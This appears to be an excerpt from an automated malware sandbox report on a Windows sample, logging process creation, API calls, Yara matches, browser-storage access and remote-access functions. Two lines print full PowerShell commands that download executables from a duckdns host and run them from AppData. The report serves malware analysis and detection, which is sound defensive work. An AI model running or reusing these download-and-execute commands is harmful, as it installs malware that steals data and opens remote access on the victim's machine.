Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -outfile 'c:\users\user\appdata\roaming\1.exe'; c:\users\user\appdata\roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -outfile 'c:\users\user\appdata\roaming\2.exe'; c:\users\user\appdata\roaming\2.exe" Jump to behavior
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3899647979.0000028475970000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram Manager
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332D5540 cpuid 0_2_00007FF7332D5540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00007FF7332B9F2C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: GetLocaleInfoW,GetNumberFormatW, 6_2_00007FF6C5729F2C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: GetLocaleInfoEx,FormatMessageA, 27_2_00007FF7033FA04C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: GetLocaleInfoW,GetNumberFormatW, 31_2_00007FF75C2C9F2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332C03B4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF7332C03B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Code function: 0_2_00007FF7332A4C24 GetVersionExW, 0_2_00007FF7332A4C24
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: 1.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4120, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\2.exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 1.exe PID: 3664, type: MEMORYSTR
Source: Yara match File source: 00000034.00000002.1958573252.000001DDAA771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4120, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\2.exe, type: DROPPED
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F2524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 27_2_00007FF7033F2524
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DBBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, 27_2_00007FF7033DBBA0